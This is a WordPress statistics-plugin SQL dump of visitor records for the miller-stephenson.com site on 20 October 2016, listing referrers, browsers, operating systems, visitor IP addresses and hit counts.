INSERT INTO `wp_statistics_visitor` VALUES (8321, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.171.104.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8322, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.191.99.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8323, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.211.195.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8324, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&cad=rja&uact=8&ved=0ahUKEwjSxaO6kurPAhWMcz4KHa3xBv0QFgheMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ab%2F&usg=AFQjCNHkN_6R29TutjS9l-uP6lY6_5YA0A&bvm=bv.136499718,d.cWw', 'MSIE', 'Windows', '11.0', '', '65.196.168.6', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8325, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.190.209.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8326, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.101.223.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8327, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.0.1', '', '64.19.198.231', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8328, '2016-10-20', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '68.230.23.99', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8329, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.168.247.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8330, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '126.28.165.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8331, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.187.35.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8332, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.201.109.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8333, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.227.50.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8334, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.103.215.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8335, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.0.1', '', '69.41.14.215', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8336, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.199.191.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8337, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.195.215.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8338, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.170.1.139', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8339, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.133.28.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8340, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.107.218.16', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8341, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.60.176.43', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8342, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.248.181.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8343, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.145.136.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8344, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.107.248.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8345, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.245.238.117', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8346, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.109.172.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8347, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.161.239.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8348, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.206.6.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8349, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.193.41.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8350, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.14.86.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8351, '2016-10-20', 'https://www.miller-stephenson.com/product/epon-828/', 'Firefox', 'Windows', '45.0', '', '134.223.230.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8352, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.201.98.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8353, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.50.18.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8354, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.13.156.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8355, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '72.252.155.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8356, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '157.204.1.3', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8357, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.1.171.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8358, '2016-10-20', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8359, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.211.36.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8360, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8361, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8362, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.101.71.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8363, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.169.1.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8364, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.125.208.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8365, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.169.113.159', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8366, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '205.206.132.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8367, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.175.96.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8368, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.171.31.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8369, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '35.9.34.81', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8370, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '12.54.185.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8371, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.47.226.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8372, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.224.215.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8373, '2016-10-20', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '50.151.36.144', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8374, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.181.153.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8375, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.76.2.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8376, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '66.50.107.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8377, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.108.98.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8378, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.45.134.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8379, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.251.53.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8380, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.10.58.236', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8381, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.111.101.244', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8382, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.5.38.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8383, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.107.66.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8384, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.126.169.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8385, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.159.150.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8386, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.133.106.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8387, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.52.11.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8388, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.122.80.255', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8389, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.238.158.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8390, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.203.235.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8391, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.102.82.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8392, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.78.210.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8393, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '191.81.33.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8394, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.157.46.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8395, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.46.65.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8396, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.154.73.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8397, '2016-10-20', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '71.121.227.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8398, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.224.37.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8399, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.63.45.160', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8400, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.137.27.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8401, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.12.243.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8402, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.100.150.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8403, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.218.46.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8404, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '201.140.135.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8405, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.235.172.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8406, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.129.127.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8407, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.85.184.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8408, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.69.207.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8409, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.112.129.197', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8410, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.172.196.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8411, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.206.112.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8412, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.206.101.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8413, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '14.139.208.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8414, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '107.209.247.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8415, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.69.30.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8416, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.200.203.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8417, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.236.115.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8418, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.49.19.93', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8419, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.148.210.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8420, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '134.17.176.225', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8421, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '101.235.107.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8422, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.105.149.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8423, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.80.100.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8424, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.204.48.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8425, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '130.207.141.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8426, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.217.103.15', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8427, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.201.75.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8428, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.155.199.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8429, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.17.225.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8430, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.185.171.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8431, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.232.167.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8432, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.244.193.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8433, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '221.35.23.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8434, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.167.253.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8435, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.220.253.198', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8436, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.54.168.155', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8437, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.28.112.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8438, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.182.51.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8439, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&sqi=2&ved=0ahUKEwitwNXonOrPAhVLOyYKHYBdAuQQFghMMAg&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg&bvm=bv.136499718,d.eWE', 'MSIE', 'Windows', '11.0', '', '149.32.192.38', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8440, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.114.97.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8441, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.141.87.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8442, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.92.66.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8443, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.149.106.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8444, '2016-10-20', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjD6fSEnerPAhWrJcAKHeH2AhYQFgg3MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '5.148.97.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8445, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.89.50.106', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8446, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.191.51.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8447, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.228.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8448, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.8.118.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8449, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.219.154.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8450, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.143.42.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8451, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.19.5.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8452, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.242.76.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8453, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.37.8.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8454, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.88.147.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8455, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.49.138.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8456, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.64.182.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8457, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '139.5.237.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8458, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.156.173.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8459, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '191.83.20.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8460, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.68.255.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8461, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.3.225.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8462, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.251.192.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8463, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.131.212.227', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8464, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.86.94.191', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8465, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.61.100.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8466, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.27.19.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8467, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.57.92.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8468, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.69.120.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8469, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '168.227.164.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8470, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.99.154.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8471, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '208.180.116.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8472, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.250.120.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8473, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.70.80.188', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8474, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.139.37.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8475, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.12.91.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8476, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.130.228.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8477, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '219.88.225.115', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8478, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.204.86.239', '000', 1, 0); 
